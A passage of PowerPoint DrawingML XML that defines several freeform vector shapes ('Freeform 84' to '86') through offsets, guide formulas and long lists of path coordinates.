                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="545"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="78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1" name="Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3646488" y="5902325"/>
                <a:ext cx="182562" cy="258763"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 410 w 505"/>
                  <a:gd name="T1" fmla="*/ 236 h 720"/>
                  <a:gd name="T2" fmla="*/ 121 w 505"/>
                  <a:gd name="T3" fmla="*/ 719 h 720"/>
                  <a:gd name="T4" fmla="*/ 0 w 505"/>
                  <a:gd name="T5" fmla="*/ 646 h 720"/>
                  <a:gd name="T6" fmla="*/ 284 w 505"/>
                  <a:gd name="T7" fmla="*/ 162 h 720"/>
                  <a:gd name="T8" fmla="*/ 410 w 505"/>
                  <a:gd name="T9" fmla="*/ 236 h 720"/>
                  <a:gd name="T10" fmla="*/ 504 w 505"/>
                  <a:gd name="T11" fmla="*/ 73 h 720"/>
                  <a:gd name="T12" fmla="*/ 441 w 505"/>
                  <a:gd name="T13" fmla="*/ 178 h 720"/>
                  <a:gd name="T14" fmla="*/ 321 w 505"/>
                  <a:gd name="T15" fmla="*/ 105 h 720"/>
                  <a:gd name="T16" fmla="*/ 383 w 505"/>
                  <a:gd name="T17" fmla="*/ 0 h 720"/>
                  <a:gd name="T18" fmla="*/ 504 w 505"/>
                  <a:gd name="T19" fmla="*/ 73 h 7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05" h="720">
                    <a:moveTo>
                      <a:pt x="410" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="121" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="504" y="73"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="441" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="73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" name="Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3746500" y="6024563"/>
                <a:ext cx="184150" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 163 w 511"/>
                  <a:gd name="T1" fmla="*/ 315 h 578"/>
                  <a:gd name="T2" fmla="*/ 142 w 511"/>
                  <a:gd name="T3" fmla="*/ 357 h 578"/>
                  <a:gd name="T4" fmla="*/ 132 w 511"/>
                  <a:gd name="T5" fmla="*/ 399 h 578"/>
                  <a:gd name="T6" fmla="*/ 137 w 511"/>
                  <a:gd name="T7" fmla="*/ 436 h 578"/>
                  <a:gd name="T8" fmla="*/ 147 w 511"/>
                  <a:gd name="T9" fmla="*/ 451 h 578"/>
                  <a:gd name="T10" fmla="*/ 163 w 511"/>
                  <a:gd name="T11" fmla="*/ 462 h 578"/>
                  <a:gd name="T12" fmla="*/ 194 w 511"/>
                  <a:gd name="T13" fmla="*/ 472 h 578"/>
                  <a:gd name="T14" fmla="*/ 220 w 511"/>
                  <a:gd name="T15" fmla="*/ 462 h 578"/>
                  <a:gd name="T16" fmla="*/ 247 w 511"/>
                  <a:gd name="T17" fmla="*/ 441 h 578"/>
                  <a:gd name="T18" fmla="*/ 394 w 511"/>
                  <a:gd name="T19" fmla="*/ 462 h 578"/>
                  <a:gd name="T20" fmla="*/ 367 w 511"/>
                  <a:gd name="T21" fmla="*/ 504 h 578"/>
                  <a:gd name="T22" fmla="*/ 310 w 511"/>
                  <a:gd name="T23" fmla="*/ 556 h 578"/>
                  <a:gd name="T24" fmla="*/ 279 w 511"/>
                  <a:gd name="T25" fmla="*/ 572 h 578"/>
                  <a:gd name="T26" fmla="*/ 205 w 511"/>
                  <a:gd name="T27" fmla="*/ 577 h 578"/>
                  <a:gd name="T28" fmla="*/ 121 w 511"/>
                  <a:gd name="T29" fmla="*/ 546 h 578"/>
                  <a:gd name="T30" fmla="*/ 90 w 511"/>
                  <a:gd name="T31" fmla="*/ 530 h 578"/>
                  <a:gd name="T32" fmla="*/ 43 w 511"/>
                  <a:gd name="T33" fmla="*/ 488 h 578"/>
                  <a:gd name="T34" fmla="*/ 26 w 511"/>
                  <a:gd name="T35" fmla="*/ 467 h 578"/>
                  <a:gd name="T36" fmla="*/ 6 w 511"/>
                  <a:gd name="T37" fmla="*/ 420 h 578"/>
                  <a:gd name="T38" fmla="*/ 0 w 511"/>
                  <a:gd name="T39" fmla="*/ 378 h 578"/>
                  <a:gd name="T40" fmla="*/ 6 w 511"/>
                  <a:gd name="T41" fmla="*/ 330 h 578"/>
                  <a:gd name="T42" fmla="*/ 21 w 511"/>
                  <a:gd name="T43" fmla="*/ 278 h 578"/>
                  <a:gd name="T44" fmla="*/ 69 w 511"/>
                  <a:gd name="T45" fmla="*/ 183 h 578"/>
                  <a:gd name="T46" fmla="*/ 126 w 511"/>
                  <a:gd name="T47" fmla="*/ 89 h 578"/>
                  <a:gd name="T48" fmla="*/ 158 w 511"/>
                  <a:gd name="T49" fmla="*/ 53 h 578"/>
                  <a:gd name="T50" fmla="*/ 194 w 511"/>
                  <a:gd name="T51" fmla="*/ 26 h 578"/>
                  <a:gd name="T52" fmla="*/ 237 w 511"/>
                  <a:gd name="T53" fmla="*/ 5 h 578"/>
                  <a:gd name="T54" fmla="*/ 284 w 511"/>
                  <a:gd name="T55" fmla="*/ 0 h 578"/>
                  <a:gd name="T56" fmla="*/ 310 w 511"/>
                  <a:gd name="T57" fmla="*/ 0 h 578"/>
                  <a:gd name="T58" fmla="*/ 367 w 511"/>
                  <a:gd name="T59" fmla="*/ 16 h 578"/>
                  <a:gd name="T60" fmla="*/ 399 w 511"/>
                  <a:gd name="T61" fmla="*/ 31 h 578"/>
                  <a:gd name="T62" fmla="*/ 467 w 511"/>
                  <a:gd name="T63" fmla="*/ 79 h 578"/>
                  <a:gd name="T64" fmla="*/ 478 w 511"/>
                  <a:gd name="T65" fmla="*/ 100 h 578"/>
                  <a:gd name="T66" fmla="*/ 510 w 511"/>
                  <a:gd name="T67" fmla="*/ 178 h 578"/>
                  <a:gd name="T68" fmla="*/ 510 w 511"/>
                  <a:gd name="T69" fmla="*/ 220 h 578"/>
                  <a:gd name="T70" fmla="*/ 494 w 511"/>
                  <a:gd name="T71" fmla="*/ 273 h 578"/>
                  <a:gd name="T72" fmla="*/ 447 w 511"/>
                  <a:gd name="T73" fmla="*/ 378 h 578"/>
                  <a:gd name="T74" fmla="*/ 184 w 511"/>
                  <a:gd name="T75" fmla="*/ 273 h 578"/>
                  <a:gd name="T76" fmla="*/ 373 w 511"/>
                  <a:gd name="T77" fmla="*/ 215 h 578"/>
                  <a:gd name="T78" fmla="*/ 378 w 511"/>
                  <a:gd name="T79" fmla="*/ 194 h 578"/>
                  <a:gd name="T80" fmla="*/ 384 w 511"/>
                  <a:gd name="T81" fmla="*/ 173 h 578"/>
                  <a:gd name="T82" fmla="*/ 378 w 511"/>
                  <a:gd name="T83" fmla="*/ 142 h 578"/>
                  <a:gd name="T84" fmla="*/ 367 w 511"/>
                  <a:gd name="T85" fmla="*/ 126 h 578"/>
                  <a:gd name="T86" fmla="*/ 347 w 511"/>
                  <a:gd name="T87" fmla="*/ 115 h 578"/>
                  <a:gd name="T88" fmla="*/ 310 w 511"/>
                  <a:gd name="T89" fmla="*/ 110 h 578"/>
                  <a:gd name="T90" fmla="*/ 294 w 511"/>
                  <a:gd name="T91" fmla="*/ 110 h 578"/>
                  <a:gd name="T92" fmla="*/ 279 w 511"/>
                  <a:gd name="T93" fmla="*/ 120 h 578"/>
                  <a:gd name="T94" fmla="*/ 252 w 511"/>
                  <a:gd name="T95" fmla="*/ 147 h 578"/>
                  <a:gd name="T96" fmla="*/ 220 w 511"/>
                  <a:gd name="T97" fmla="*/ 200 h 578"/>
                  <a:gd name="T98" fmla="*/ 352 w 511"/>
                  <a:gd name="T99" fmla="*/ 267 h 5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11" h="578">
                    <a:moveTo>
                      <a:pt x="163" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="315"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="373" y="215"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="373" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="215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3" name="Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3902075" y="6097588"/>
                <a:ext cx="184150" cy="212725"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 142 w 510"/>
                  <a:gd name="T1" fmla="*/ 368 h 589"/>
                  <a:gd name="T2" fmla="*/ 136 w 510"/>
                  <a:gd name="T3" fmla="*/ 431 h 589"/>
                  <a:gd name="T4" fmla="*/ 142 w 510"/>
                  <a:gd name="T5" fmla="*/ 441 h 589"/>
                  <a:gd name="T6" fmla="*/ 178 w 510"/>
                  <a:gd name="T7" fmla="*/ 473 h 589"/>
                  <a:gd name="T8" fmla="*/ 204 w 510"/>
                  <a:gd name="T9" fmla="*/ 484 h 589"/>
                  <a:gd name="T10" fmla="*/ 230 w 510"/>
                  <a:gd name="T11" fmla="*/ 478 h 589"/>
                  <a:gd name="T12" fmla="*/ 252 w 510"/>
                  <a:gd name="T13" fmla="*/ 468 h 589"/>
                  <a:gd name="T14" fmla="*/ 267 w 510"/>
                  <a:gd name="T15" fmla="*/ 441 h 589"/>
                  <a:gd name="T16" fmla="*/ 273 w 510"/>
                  <a:gd name="T17" fmla="*/ 400 h 589"/>
                  <a:gd name="T18" fmla="*/ 262 w 510"/>
                  <a:gd name="T19" fmla="*/ 379 h 589"/>
                  <a:gd name="T20" fmla="*/ 173 w 510"/>
                  <a:gd name="T21" fmla="*/ 289 h 589"/>
                  <a:gd name="T22" fmla="*/ 152 w 510"/>
                  <a:gd name="T23" fmla="*/ 268 h 589"/>
                  <a:gd name="T24" fmla="*/ 120 w 510"/>
                  <a:gd name="T25" fmla="*/ 221 h 589"/>
                  <a:gd name="T26" fmla="*/ 110 w 510"/>
                  <a:gd name="T27" fmla="*/ 200 h 589"/>
                  <a:gd name="T28" fmla="*/ 110 w 510"/>
                  <a:gd name="T29" fmla="*/ 147 h 589"/>
                  <a:gd name="T30" fmla="*/ 126 w 510"/>
                  <a:gd name="T31" fmla="*/ 95 h 589"/>
                  <a:gd name="T32" fmla="*/ 142 w 510"/>
                  <a:gd name="T33" fmla="*/ 69 h 589"/>
                  <a:gd name="T34" fmla="*/ 163 w 510"/>
                  <a:gd name="T35" fmla="*/ 43 h 589"/>
                  <a:gd name="T36" fmla="*/ 215 w 510"/>
                  <a:gd name="T37" fmla="*/ 11 h 589"/>
                  <a:gd name="T38" fmla="*/ 252 w 510"/>
                  <a:gd name="T39" fmla="*/ 0 h 589"/>
                  <a:gd name="T40" fmla="*/ 289 w 510"/>
                  <a:gd name="T41" fmla="*/ 0 h 589"/>
                  <a:gd name="T42" fmla="*/ 383 w 510"/>
                  <a:gd name="T43" fmla="*/ 27 h 589"/>
                  <a:gd name="T44" fmla="*/ 420 w 510"/>
                  <a:gd name="T45" fmla="*/ 48 h 589"/>
                  <a:gd name="T46" fmla="*/ 477 w 510"/>
                  <a:gd name="T47" fmla="*/ 95 h 589"/>
                  <a:gd name="T48" fmla="*/ 498 w 510"/>
                  <a:gd name="T49" fmla="*/ 126 h 589"/>
                  <a:gd name="T50" fmla="*/ 509 w 510"/>
                  <a:gd name="T51" fmla="*/ 184 h 589"/>
                  <a:gd name="T52" fmla="*/ 493 w 510"/>
                  <a:gd name="T53" fmla="*/ 253 h 589"/>
                  <a:gd name="T54" fmla="*/ 362 w 510"/>
                  <a:gd name="T55" fmla="*/ 221 h 589"/>
                  <a:gd name="T56" fmla="*/ 378 w 510"/>
                  <a:gd name="T57" fmla="*/ 184 h 589"/>
                  <a:gd name="T58" fmla="*/ 378 w 510"/>
                  <a:gd name="T59" fmla="*/ 153 h 589"/>
                  <a:gd name="T60" fmla="*/ 367 w 510"/>
                  <a:gd name="T61" fmla="*/ 132 h 589"/>
                  <a:gd name="T62" fmla="*/ 341 w 510"/>
                  <a:gd name="T63" fmla="*/ 116 h 589"/>
                  <a:gd name="T64" fmla="*/ 289 w 510"/>
                  <a:gd name="T65" fmla="*/ 111 h 589"/>
                  <a:gd name="T66" fmla="*/ 278 w 510"/>
                  <a:gd name="T67" fmla="*/ 116 h 589"/>
                  <a:gd name="T68" fmla="*/ 252 w 510"/>
                  <a:gd name="T69" fmla="*/ 143 h 589"/>
                  <a:gd name="T70" fmla="*/ 252 w 510"/>
                  <a:gd name="T71" fmla="*/ 163 h 589"/>
                  <a:gd name="T72" fmla="*/ 252 w 510"/>
                  <a:gd name="T73" fmla="*/ 184 h 589"/>
                  <a:gd name="T74" fmla="*/ 283 w 510"/>
                  <a:gd name="T75" fmla="*/ 232 h 589"/>
                  <a:gd name="T76" fmla="*/ 351 w 510"/>
                  <a:gd name="T77" fmla="*/ 289 h 589"/>
                  <a:gd name="T78" fmla="*/ 394 w 510"/>
                  <a:gd name="T79" fmla="*/ 337 h 589"/>
                  <a:gd name="T80" fmla="*/ 414 w 510"/>
                  <a:gd name="T81" fmla="*/ 384 h 589"/>
                  <a:gd name="T82" fmla="*/ 420 w 510"/>
                  <a:gd name="T83" fmla="*/ 410 h 589"/>
                  <a:gd name="T84" fmla="*/ 409 w 510"/>
                  <a:gd name="T85" fmla="*/ 457 h 589"/>
                  <a:gd name="T86" fmla="*/ 399 w 510"/>
                  <a:gd name="T87" fmla="*/ 489 h 589"/>
                  <a:gd name="T88" fmla="*/ 351 w 510"/>
                  <a:gd name="T89" fmla="*/ 552 h 589"/>
                  <a:gd name="T90" fmla="*/ 325 w 510"/>
                  <a:gd name="T91" fmla="*/ 573 h 589"/>
                  <a:gd name="T92" fmla="*/ 294 w 510"/>
                  <a:gd name="T93" fmla="*/ 583 h 589"/>
                  <a:gd name="T94" fmla="*/ 220 w 510"/>
                  <a:gd name="T95" fmla="*/ 588 h 589"/>
                  <a:gd name="T96" fmla="*/ 178 w 510"/>
                  <a:gd name="T97" fmla="*/ 578 h 589"/>
                  <a:gd name="T98" fmla="*/ 142 w 510"/>
                  <a:gd name="T99" fmla="*/ 562 h 589"/>
                  <a:gd name="T100" fmla="*/ 53 w 510"/>
                  <a:gd name="T101" fmla="*/ 510 h 589"/>
                  <a:gd name="T102" fmla="*/ 26 w 510"/>
                  <a:gd name="T103" fmla="*/ 484 h 589"/>
                  <a:gd name="T104" fmla="*/ 10 w 510"/>
                  <a:gd name="T105" fmla="*/ 452 h 589"/>
                  <a:gd name="T106" fmla="*/ 0 w 510"/>
                  <a:gd name="T107" fmla="*/ 389 h 589"/>
                  <a:gd name="T108" fmla="*/ 10 w 510"/>
                  <a:gd name="T109" fmla="*/ 352 h 589"/>
                  <a:gd name="T110" fmla="*/ 31 w 510"/>
                  <a:gd name="T111" fmla="*/ 300 h 589"/>
                  <a:gd name="T112" fmla="*/ 142 w 510"/>
                  <a:gd name="T113" fmla="*/ 368 h 5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10" h="589">
                    <a:moveTo>
                      <a:pt x="142" y="368"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
